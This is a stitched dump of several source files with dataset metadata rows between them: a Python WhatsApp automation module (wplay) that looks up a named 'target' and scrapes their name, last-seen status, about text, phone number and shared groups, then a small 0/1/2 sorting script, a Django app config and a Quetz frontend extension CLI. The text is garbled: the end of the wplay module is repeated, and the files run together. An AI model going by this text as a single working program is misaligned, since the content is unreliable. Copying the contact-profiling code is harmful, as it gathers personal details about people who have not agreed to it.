contact_list_unchecked = list(zip(contact_titles_unchecked, contact_list_elements_unchecked))
return contact_list_unchecked
def __zip_group_titles_and_elements_unchecked(group_titles_unchecked, group_list_elements_unchecked):
group_list_unchecked = list(zip(group_titles_unchecked, group_list_elements_unchecked))
return group_list_unchecked
# __checking_contact_list verify if target is in title, if not we pop from list
def __check_contact_list(target, contact_list_unchecked):
i = 0
while i < len(contact_list_unchecked):
if len(contact_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive contacts
if contact_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
contact_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
contact_tuple = tuple(contact_list_unchecked)
return contact_tuple
def __check_group_list(target, group_list_unchecked):
i = 0
while i < len(group_list_unchecked):
if len(group_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive groups
if group_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
group_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
group_tuple = tuple(group_list_unchecked)
return group_tuple
# target_list is like that: (((0, 'a'), (1, 'b')), ((3, 'c'), (4, 'd'))),
# but instead numbers and letters we have titles and elements
# the first index is the contacts and the second is the groups
def __get_target_tuple(contact_tuple, group_tuple):
target_tuple = (contact_tuple, group_tuple)
return target_tuple
def __print_target_tuple(target_tuple):
lenght_of_contacts_tuple = len(target_tuple[0])
lenght_of_groups_tuple = len(target_tuple[1])
for i in range(lenght_of_contacts_tuple):
if lenght_of_contacts_tuple <= 0:
break
if i == 0:
print("Contacts found:")
logger.info('List of Targets')
print(f'{i}: {target_tuple[0][i][0]}')
for i in range(lenght_of_contacts_tuple, lenght_of_groups_tuple + lenght_of_contacts_tuple):
if lenght_of_groups_tuple <= 0:
break
if i == lenght_of_contacts_tuple:
print("Groups found:")
logger.info('List of Target in groups')
print(f'{i}: {target_tuple[1][i-lenght_of_contacts_tuple][0]}')
def __ask_user_to_choose_the_filtered_target(target_tuple):
if len(target_tuple[0] + target_tuple[1]) > 0:
logger.info('Input Target Number')
target_index_choosed = int(
input('Enter the number of the target you wish to choose: '))
return target_index_choosed
def __get_choosed_target(target_tuple, target_index_choosed):
lenght_of_contacts_tuple = len(target_tuple[0])
if target_index_choosed is None:
exit()
try:
if target_index_choosed < lenght_of_contacts_tuple:
choosed_target = target_tuple[0][target_index_choosed]
elif target_index_choosed >= lenght_of_contacts_tuple:
choosed_target = target_tuple[1][target_index_choosed - lenght_of_contacts_tuple]
else:
print("This target doesn't exist!")
logger.error('Invalid Target')
exit()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
return choosed_target
async def __navigate_to_target(page, choosed_target):
try:
await choosed_target[1].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
async def __get_focused_target_title(page, target):
try:
await page.waitForSelector(whatsapp_selectors_dict['target_focused_title'])
target_focused_title = await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["target_focused_title"]}").getAttribute("title")')
except Exception as e:
print(f'No target selected! Error: {str(e)}')
logger.error('Target not selected from list')
exit()
return target_focused_title
def __print_selected_target_title(target_focused_title):
print(f"You've selected the target named by: {target_focused_title}")
logger.info('Selected Target')
def __check_target_focused_title(page, target, target_focused_title):
if target_focused_title.lower().find(target.lower()) == -1:
print(f"You're focused in the wrong target, {target_focused_title}")
must_continue = str(input("Do you want to continue (yes/no)? "))
accepted_yes = {'yes', 'y'}
if must_continue.lower() in accepted_yes:
pass
else:
exit()
async def __wait_for_message_area(page):
try:
await page.waitForSelector(whatsapp_selectors_dict['message_area'])
except Exception as e:
print(f"You don't belong this group anymore! Error: {str(e)}")
# endregion
| 38.94433
| 189
| 0.72194
|
__author__ = 'Alexandre Calil Martins Fonseca, github: xandao6'
from wplay.utils.helpers import whatsapp_selectors_dict
from wplay.utils import Logger
from wplay.utils.helpers import logs_path
from pyppeteer.errors import ElementHandleError
async def search_and_select_target(page, target, hide_groups=False):
await __open_new_chat(page)
await __type_in_new_chat_search_bar(page, target)
contact_list_elements_unchecked = await __get_contacts_elements_filtered(page, target)
group_list_elements_unchecked = await __get_groups_elements_filtered(page, target, hide_groups)
contact_titles_unchecked = await __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked)
group_titles_unchecked = await __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked)
contact_list_unchecked = __zip_contact_titles_and_elements_unchecked(
contact_titles_unchecked, contact_list_elements_unchecked)
group_list_unchecked = __zip_group_titles_and_elements_unchecked(
group_titles_unchecked, group_list_elements_unchecked)
contact_tuple = __check_contact_list(target, contact_list_unchecked)
group_tuple = __check_group_list(target, group_list_unchecked)
target_tuple = __get_target_tuple(contact_tuple, group_tuple)
__print_target_tuple(target_tuple)
target_index_choosed = __ask_user_to_choose_the_filtered_target(target_tuple)
choosed_target = __get_choosed_target(target_tuple, target_index_choosed)
await __navigate_to_target(page, choosed_target)
target_focused_title = await __get_focused_target_title(page, target)
if any(choosed_target[0] in i for i in contact_tuple):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_focused_title)
__check_target_focused_title(page, target, target_focused_title)
await __wait_for_message_area(page)
return target_focused_title
async def search_and_select_target_without_new_chat_button(page,target, hide_groups=False):
await __type_in_chat_or_message_search(page,target)
chats_messages_groups_elements_list = await __get_chats_messages_groups_elements(page)
contact_name_index_tuple_list = await __get_contacts_matched_with_query(chats_messages_groups_elements_list)
group_name_index_tuple_list = await __get_groups_matched_with_query(chats_messages_groups_elements_list,hide_groups)
target_tuple = (contact_name_index_tuple_list,group_name_index_tuple_list)
__print_target_tuple(target_tuple)
target_index_chosen = __ask_user_to_choose_the_filtered_target(target_tuple)
chosen_target = __get_choosed_target(target_tuple, target_index_chosen)
await __open_selected_chat(chosen_target[1],chats_messages_groups_elements_list)
target_name = chosen_target[0]
if any(chosen_target[0] in i for i in contact_name_index_tuple_list):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_name)
await __wait_for_message_area(page)
return target_name
logger : Logger = Logger.setup_logger('logs',logs_path/'logs.log')
async def __type_in_chat_or_message_search(page,target):
try:
print(f'Looking for: {target}')
await page.waitForSelector(
whatsapp_selectors_dict['chat_or_message_search'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.type(whatsapp_selectors_dict['chat_or_message_search'], target)
await page.waitFor(3000)
except Exception as e:
print(e)
async def __get_chats_messages_groups_elements(page):
chats_messages_groups_elements_list = []
try:
chats_messages_groups_elements_list = await page.querySelectorAll\
(whatsapp_selectors_dict['chats_groups_messages_elements'])
return chats_messages_groups_elements_list
except Exception as e:
print(e)
exit()
async def __get_contacts_matched_with_query(chats_groups_messages_elements_list):
contacts_to_choose_from = []
get_contact_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
contact_name = await element.querySelectorEval(whatsapp_selectors_dict['contact_element'],get_contact_node_title_function)
contacts_to_choose_from.append((contact_name,idx))
except ElementHandleError:
continue
except Exception as e:
print(e)
return contacts_to_choose_from
async def __get_groups_matched_with_query(chats_groups_messages_elements_list,hide_groups):
groups_to_choose_from = []
if hide_groups:
return groups_to_choose_from
get_group_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
group_name = await element.querySelectorEval(whatsapp_selectors_dict['group_element'],
get_group_node_title_function)
groups_to_choose_from.append((group_name,idx))
except ElementHandleError:
continue
except Exception as e:
print(e)
return groups_to_choose_from
async def __open_selected_chat(target_index,chats_messages_groups_elements_list):
try:
await chats_messages_groups_elements_list[target_index].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
exit()
async def get_complete_info_on_target(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['target_chat_header'],
visible=True,
timeout=3000
)
await page.click(whatsapp_selectors_dict['target_chat_header'])
contact_page_elements = await get_contact_page_elements(page)
complete_target_info = {}
await get_contact_name_info(contact_page_elements[0], complete_target_info)
await get_contact_about_and_phone(contact_page_elements[3], complete_target_info)
await get_contact_groups_common_with_target(complete_target_info, page)
except Exception as e:
print(e)
return complete_target_info
async def get_contact_page_elements(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_elements'],
visible=True,
timeout=8000
)
contact_page_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_elements'])
except Exception as e:
print(e)
return contact_page_elements
async def get_contact_name_info(contact_name_element,complete_target_info):
try:
complete_target_info['Name'] = await contact_name_element.querySelectorEval('span > span', 'element => element.innerText')
complete_target_info['Last_seen'] = await contact_name_element.querySelectorEval('div > span:last-of-type > div > span', 'element => element.getAttribute("title")')
except:
print(f'last seen not available')
async def get_contact_about_and_phone(contact_name_element, complete_target_info):
try:
complete_target_info['About'] = await contact_name_element.querySelectorEval('div:nth-child(2) > div > div > span > span', 'element => element.getAttribute("title")')
complete_target_info['Mobile'] = await contact_name_element.querySelectorEval('div:last-of-type > div > div > span > span', 'element => element.innerText')
except Exception as e:
print(e)
async def get_contact_groups_common_with_target(complete_target_info,page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_group_element_heading'],
visible= True,
timeout=3000
)
if (await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["contact_info_page_group_element_heading"]}").innerText'))\
== "Groups in common":
group_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_group_elements'])
complete_target_info['Groups'] = [await ele.querySelectorEval('div>div>div:nth-child(2)>div:first-child>div>div>span', 'e => e.getAttribute("title")') for ele in group_elements]
else:
complete_target_info['Groups'] = []
except:
complete_target_info['Groups'] = []
print(f'No groups in common')
async def close_contact_info_page(page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_close_button'],
visible = True,
timeout = 5000
)
await page.click(whatsapp_selectors_dict['contact_info_page_close_button'])
except Exception as e:
print(e)
def print_complete_target_info(complete_target_info):
for key in complete_target_info.keys():
if key == "Groups":
print("Groups:")
print(*complete_target_info[key], sep=",")
else:
print(f'{key}: {complete_target_info[key]} ')
async def __open_new_chat(page):
await page.waitForSelector(
whatsapp_selectors_dict['new_chat_button'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.click(whatsapp_selectors_dict['new_chat_button'])
async def __type_in_new_chat_search_bar(page, target):
print(f'Looking for: {target}')
logger.info('Searching Target')
await page.waitForSelector(
whatsapp_selectors_dict['search_contact_input_new_chat'],
visible=True
)
await page.type(whatsapp_selectors_dict['search_contact_input_new_chat'], target)
await page.waitFor(3000)
async def __get_contacts_elements_filtered(page, target):
contact_list_elements_unchecked = list()
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
contact_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat']
)
except:
print(f'No contact named by "{target}"!')
logger.info('Target not found')
return contact_list_elements_unchecked
async def __get_groups_elements_filtered(page, target, hide_groups=False):
group_list_elements_unchecked = list()
if hide_groups:
return group_list_elements_unchecked
try:
await page.waitForSelector(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
group_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat']
)
except:
print(f'No group named by "{target}"!')
logger.info('Target not found in groups')
return group_list_elements_unchecked
async def __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked):
contact_titles_unchecked = []
for i in range(len(contact_list_elements_unchecked)):
contact_titles_unchecked\
.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["contact_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return contact_titles_unchecked
async def __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked):
group_titles_unchecked = []
for i in range(len(group_list_elements_unchecked)):
group_titles_unchecked.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["group_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return group_titles_unchecked
# contact_list_unchecked is a zip (list of tuples) of contact_titles and
# contact elements, unchecked.
def __zip_contact_titles_and_elements_unchecked(contact_titles_unchecked, contact_list_elements_unchecked):
contact_list_unchecked = list(zip(contact_titles_unchecked, contact_list_elements_unchecked))
return contact_list_unchecked
def __zip_group_titles_and_elements_unchecked(group_titles_unchecked, group_list_elements_unchecked):
group_list_unchecked = list(zip(group_titles_unchecked, group_list_elements_unchecked))
return group_list_unchecked
# __checking_contact_list verify if target is in title, if not we pop from list
def __check_contact_list(target, contact_list_unchecked):
i = 0
while i < len(contact_list_unchecked):
if len(contact_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive contacts
if contact_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
contact_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
contact_tuple = tuple(contact_list_unchecked)
return contact_tuple
def __check_group_list(target, group_list_unchecked):
i = 0
while i < len(group_list_unchecked):
if len(group_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive groups
if group_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
group_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
group_tuple = tuple(group_list_unchecked)
return group_tuple
# target_list is like that: (((0, 'a'), (1, 'b')), ((3, 'c'), (4, 'd'))),
# but instead numbers and letters we have titles and elements
# the first index is the contacts and the second is the groups
def __get_target_tuple(contact_tuple, group_tuple):
target_tuple = (contact_tuple, group_tuple)
return target_tuple
def __print_target_tuple(target_tuple):
lenght_of_contacts_tuple = len(target_tuple[0])
lenght_of_groups_tuple = len(target_tuple[1])
for i in range(lenght_of_contacts_tuple):
if lenght_of_contacts_tuple <= 0:
break
if i == 0:
print("Contacts found:")
logger.info('List of Targets')
print(f'{i}: {target_tuple[0][i][0]}')
for i in range(lenght_of_contacts_tuple, lenght_of_groups_tuple + lenght_of_contacts_tuple):
if lenght_of_groups_tuple <= 0:
break
if i == lenght_of_contacts_tuple:
print("Groups found:")
logger.info('List of Target in groups')
print(f'{i}: {target_tuple[1][i-lenght_of_contacts_tuple][0]}')
def __ask_user_to_choose_the_filtered_target(target_tuple):
if len(target_tuple[0] + target_tuple[1]) > 0:
logger.info('Input Target Number')
target_index_choosed = int(
input('Enter the number of the target you wish to choose: '))
return target_index_choosed
def __get_choosed_target(target_tuple, target_index_choosed):
lenght_of_contacts_tuple = len(target_tuple[0])
if target_index_choosed is None:
exit()
try:
if target_index_choosed < lenght_of_contacts_tuple:
choosed_target = target_tuple[0][target_index_choosed]
elif target_index_choosed >= lenght_of_contacts_tuple:
choosed_target = target_tuple[1][target_index_choosed - lenght_of_contacts_tuple]
else:
print("This target doesn't exist!")
logger.error('Invalid Target')
exit()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
return choosed_target
async def __navigate_to_target(page, choosed_target):
try:
await choosed_target[1].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
async def __get_focused_target_title(page, target):
try:
await page.waitForSelector(whatsapp_selectors_dict['target_focused_title'])
target_focused_title = await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["target_focused_title"]}").getAttribute("title")')
except Exception as e:
print(f'No target selected! Error: {str(e)}')
logger.error('Target not selected from list')
exit()
return target_focused_title
def __print_selected_target_title(target_focused_title):
print(f"You've selected the target named by: {target_focused_title}")
logger.info('Selected Target')
def __check_target_focused_title(page, target, target_focused_title):
if target_focused_title.lower().find(target.lower()) == -1:
print(f"You're focused in the wrong target, {target_focused_title}")
must_continue = str(input("Do you want to continue (yes/no)? "))
accepted_yes = {'yes', 'y'}
if must_continue.lower() in accepted_yes:
pass
else:
exit()
async def __wait_for_message_area(page):
try:
await page.waitForSelector(whatsapp_selectors_dict['message_area'])
except Exception as e:
print(f"You don't belong this group anymore! Error: {str(e)}")
# endregion
| true
| true
|
f7053131cfb854f87cef18f6a13009e7cb2dedd0
| 349
|
py
|
Python
|
21 Others/BEG.py
|
XuuRee/python-data-structures
|
a3972f5781d666d15d61c0d474877880d1b7c483
|
[
"MIT"
] | null | null | null |
21 Others/BEG.py
|
XuuRee/python-data-structures
|
a3972f5781d666d15d61c0d474877880d1b7c483
|
[
"MIT"
] | null | null | null |
21 Others/BEG.py
|
XuuRee/python-data-structures
|
a3972f5781d666d15d61c0d474877880d1b7c483
|
[
"MIT"
] | null | null | null |
def beg(arr):
a = []
b = []
c = []
for i in arr:
if i == 0:
a.append(i)
if i == 1:
b.append(i)
if i == 2:
c.append(i)
return a+b+c
a = []
b = [0,0,0]
c = [1,2,1,1,2,1,2]
d = [0,2,1,0,1,0,2,2,2,1,0,2,1,0,1,2,0]
print(beg(a))
print(beg(b))
print(beg(c))
print(beg(d))
| 14.541667
| 39
| 0.381089
|
def beg(arr):
a = []
b = []
c = []
for i in arr:
if i == 0:
a.append(i)
if i == 1:
b.append(i)
if i == 2:
c.append(i)
return a+b+c
a = []
b = [0,0,0]
c = [1,2,1,1,2,1,2]
d = [0,2,1,0,1,0,2,2,2,1,0,2,1,0,1,2,0]
print(beg(a))
print(beg(b))
print(beg(c))
print(beg(d))
| true
| true
|
f7053142d8894d29c2b779e200a2ae10343b6829
| 138
|
py
|
Python
|
modules/msa/msa/contrib/master/apps.py
|
haoyutan/MSA-Framework
|
7c5553b244347f26029729161e15e60b0cc805f5
|
[
"MIT"
] | 2
|
2016-11-22T11:44:52.000Z
|
2017-08-29T02:38:01.000Z
|
modules/msa/msa/contrib/master/apps.py
|
haoyutan/MSA-Framework
|
7c5553b244347f26029729161e15e60b0cc805f5
|
[
"MIT"
] | null | null | null |
modules/msa/msa/contrib/master/apps.py
|
haoyutan/MSA-Framework
|
7c5553b244347f26029729161e15e60b0cc805f5
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class MasterAppConfig(AppConfig):
name = 'msa.contrib.master'
verbose_name = 'Master Service'
| 19.714286
| 35
| 0.746377
|
from django.apps import AppConfig
class MasterAppConfig(AppConfig):
name = 'msa.contrib.master'
verbose_name = 'Master Service'
| true
| true
|
f70531491a4fe1bfff0ca5ec957d7f9cd2f74762
| 8,381
|
py
|
Python
|
quetz_frontend/cli.py
|
hbcarlos/quetz-frontend
|
86a41de3a3e05c4c324bf2c5f2d4dda76a4fa3ce
|
[
"BSD-3-Clause"
] | null | null | null |
quetz_frontend/cli.py
|
hbcarlos/quetz-frontend
|
86a41de3a3e05c4c324bf2c5f2d4dda76a4fa3ce
|
[
"BSD-3-Clause"
] | null | null | null |
quetz_frontend/cli.py
|
hbcarlos/quetz-frontend
|
86a41de3a3e05c4c324bf2c5f2d4dda76a4fa3ce
|
[
"BSD-3-Clause"
] | null | null | null |
import importlib
import json
import os
import shutil
import subprocess
from pathlib import Path
from shutil import which
from typing import List, Optional, Tuple
from setuptools import find_packages
from typer import Argument, Option, Typer
from .paths import (
GLOBAL_APP_DIR,
GLOBAL_EXTENSIONS_DIR,
GLOBAL_FRONTEND_DIR,
GLOBAL_QUETZ_DIR,
LOCAL_APP_DIR,
)
from .utils import clean_dir, get_extensions_dir, get_federated_extensions
app = Typer()
@app.command()
def link_frontend(
dev_mode: bool = Option(
False, "--development", help="Whether to install it in dev mode or not"
)
) -> None:
"""Intall the Quetz-Frontend"""
assert LOCAL_APP_DIR.exists()
if not GLOBAL_FRONTEND_DIR.exists():
GLOBAL_FRONTEND_DIR.mkdir(parents=True, exist_ok=True)
if GLOBAL_APP_DIR.exists():
if GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
else:
shutil.rmtree(GLOBAL_APP_DIR)
if dev_mode:
GLOBAL_APP_DIR.symlink_to(LOCAL_APP_DIR)
print(
f"""Symlink created:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
else:
shutil.copytree(LOCAL_APP_DIR, GLOBAL_APP_DIR, symlinks=True)
print(
f"""App directory copied:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
@app.command()
def clean_frontend() -> None:
"""Clean the Quetz-Frontend"""
if GLOBAL_APP_DIR.is_file() or GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
elif GLOBAL_APP_DIR.is_dir():
shutil.rmtree(GLOBAL_APP_DIR)
@app.command()
def install(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(ext_path, True, False)
module, metadata = _get_extensions_metadata(extension_path)
src = Path(extension_path).joinpath(module.__name__, metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(metadata[0]["dest"])
clean_dir(dest)
shutil.copytree(src, dest, symlinks=True)
print(
f"""
Extension installed:
Path: {dest}
"""
)
@app.command()
def develop(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension in dev mode"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, True, False)
_develop_extension(extension_path)
@app.command()
def build(
ext_path: str = Argument(Path(), help="The path of the extension"),
dev_mode: bool = Option(False, "--development", help="Build in development"),
) -> None:
"""Build an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, dev_mode, False)
@app.command()
def watch(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Watch an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_develop_extension(extension_path)
_build_extension(extension_path, True, True)
@app.command()
def uninstall(ext_name: str = Argument("", help="The name of the extension")) -> None:
"""Uninstall an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(GLOBAL_EXTENSIONS_DIR, ext_name)
clean_dir(extension_path)
@app.command()
def list() -> None:
"""List of extensions"""
print(f"Installed extensions:")
print(f"---------------------")
print(f" Installation path: '{GLOBAL_EXTENSIONS_DIR}'\n")
extensions = get_federated_extensions([get_extensions_dir()])
if not extensions:
print("No installed extensions yet")
for ext in extensions.values():
print(f'\t- {Path(ext["ext_path"]).relative_to(GLOBAL_EXTENSIONS_DIR)}')
print()
@app.command()
def clean() -> None:
"""Clean the extensions directory"""
if GLOBAL_EXTENSIONS_DIR.exists():
shutil.rmtree(GLOBAL_EXTENSIONS_DIR)
@app.command()
def paths() -> None:
"""Quetz installation paths"""
print(
f"""
System cofigured paths:
Quetz: {GLOBAL_QUETZ_DIR}
Frontend: {GLOBAL_FRONTEND_DIR}
App: {GLOBAL_APP_DIR}
Extensions: {GLOBAL_EXTENSIONS_DIR}
"""
)
def _develop_extension(ext_path: Path):
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
_, metadata = _get_extensions_metadata(ext_path)
src = ext_path / ext_data["quetz"].get("outputDir", metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(ext_data["name"])
clean_dir(dest)
# Create parent directory if extension name is scoped
dest.parent.mkdir(parents=True, exist_ok=True)
dest.symlink_to(src)
print(
f"""
Symlink created:
Ori: {src!s}
Dest: {dest!s}
"""
)
def _build_extension(ext_path: Path, dev_mode: bool = False, watch: bool = False):
if not GLOBAL_APP_DIR.joinpath("package.json").exists():
print(f"Quetz frontend not fount at '{GLOBAL_APP_DIR!s}'")
builder_path = _find_builder(ext_path)
if builder_path is None:
print(f"Could not find @quetz-frontend/builder at {ext_path!s}")
print(f"Extensions require a devDependency '@quetz-frontend/builder'")
return
exe = "node"
exe_path = which(exe)
if not exe_path:
print(f"Could not find {exe}. Install NodeJS.")
exit(1)
command = [exe, str(builder_path), "--core-path", str(GLOBAL_APP_DIR.resolve())]
if dev_mode:
command.append("--development")
command.append("--source-map")
if watch:
command.append("--watch")
command.append(str(ext_path))
print("Building extension")
subprocess.check_call(command)
def _find_builder(ext_path: Path) -> Optional[Path]:
"""Find the package '@quetz-frontend/builder' in the extension dependencies"""
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
depVersion2 = ext_data.get("devDependencies", dict()).get("@quetz-frontend/builder")
depVersion2 = depVersion2 or ext_data.get("dependencies", dict()).get(
"@quetz-frontend/builder"
)
if depVersion2 is None:
return None
# Find @quetz-frontend/builder in the node_modules directory
target = ext_path
while not (target / "node_modules" / "@quetz-frontend" / "builder").exists():
if target.parent == target:
return None
target = target.parent
return (
target
/ "node_modules"
/ "@quetz-frontend"
/ "builder"
/ "lib"
/ "build-quetzextension.js"
)
def _get_extensions_metadata(
module_path: Path,
) -> Tuple["importlib.ModuleType", List[str]]:
mod_path = module_path.resolve()
if not mod_path.exists():
raise FileNotFoundError(f"The path `{mod_path!s}` does not exist.")
# TODO: Change function name to match lab
try:
module = importlib.import_module(str(module_path))
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
else:
module = None
except Exception:
module = None
# Looking for modules in the package
packages = find_packages(str(mod_path))
for package in packages:
try:
module = importlib.import_module(package)
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
except Exception:
module = None
raise ModuleNotFoundError(f"There is not a extension at {module_path}")
if __name__ == "__main__":
app()
| 26.862179
| 88
| 0.65386
|
import importlib
import json
import os
import shutil
import subprocess
from pathlib import Path
from shutil import which
from typing import List, Optional, Tuple
from setuptools import find_packages
from typer import Argument, Option, Typer
from .paths import (
GLOBAL_APP_DIR,
GLOBAL_EXTENSIONS_DIR,
GLOBAL_FRONTEND_DIR,
GLOBAL_QUETZ_DIR,
LOCAL_APP_DIR,
)
from .utils import clean_dir, get_extensions_dir, get_federated_extensions
app = Typer()
@app.command()
def link_frontend(
dev_mode: bool = Option(
False, "--development", help="Whether to install it in dev mode or not"
)
) -> None:
assert LOCAL_APP_DIR.exists()
if not GLOBAL_FRONTEND_DIR.exists():
GLOBAL_FRONTEND_DIR.mkdir(parents=True, exist_ok=True)
if GLOBAL_APP_DIR.exists():
if GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
else:
shutil.rmtree(GLOBAL_APP_DIR)
if dev_mode:
GLOBAL_APP_DIR.symlink_to(LOCAL_APP_DIR)
print(
f"""Symlink created:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
else:
shutil.copytree(LOCAL_APP_DIR, GLOBAL_APP_DIR, symlinks=True)
print(
f"""App directory copied:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
@app.command()
def clean_frontend() -> None:
if GLOBAL_APP_DIR.is_file() or GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
elif GLOBAL_APP_DIR.is_dir():
shutil.rmtree(GLOBAL_APP_DIR)
@app.command()
def install(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(ext_path, True, False)
module, metadata = _get_extensions_metadata(extension_path)
src = Path(extension_path).joinpath(module.__name__, metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(metadata[0]["dest"])
clean_dir(dest)
shutil.copytree(src, dest, symlinks=True)
print(
f"""
Extension installed:
Path: {dest}
"""
)
@app.command()
def develop(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, True, False)
_develop_extension(extension_path)
@app.command()
def build(
ext_path: str = Argument(Path(), help="The path of the extension"),
dev_mode: bool = Option(False, "--development", help="Build in development"),
) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, dev_mode, False)
@app.command()
def watch(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_develop_extension(extension_path)
_build_extension(extension_path, True, True)
@app.command()
def uninstall(ext_name: str = Argument("", help="The name of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(GLOBAL_EXTENSIONS_DIR, ext_name)
clean_dir(extension_path)
@app.command()
def list() -> None:
print(f"Installed extensions:")
print(f"---------------------")
print(f" Installation path: '{GLOBAL_EXTENSIONS_DIR}'\n")
extensions = get_federated_extensions([get_extensions_dir()])
if not extensions:
print("No installed extensions yet")
for ext in extensions.values():
